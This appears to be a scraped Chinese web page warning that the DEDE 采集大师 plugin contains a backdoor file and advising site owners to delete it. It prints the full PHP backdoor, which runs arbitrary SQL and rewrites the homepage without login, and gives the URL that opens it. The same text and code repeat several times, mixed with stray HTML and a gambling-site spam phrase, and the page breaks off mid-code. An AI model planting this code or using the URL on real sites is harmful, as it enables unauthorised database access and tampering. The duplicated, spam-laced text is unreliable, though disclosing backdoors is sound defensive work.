</tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>,见下图

DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法,如下图

DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

如下图

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>,如下图

DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法,见图

喜来登线上娱乐备用网址去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = 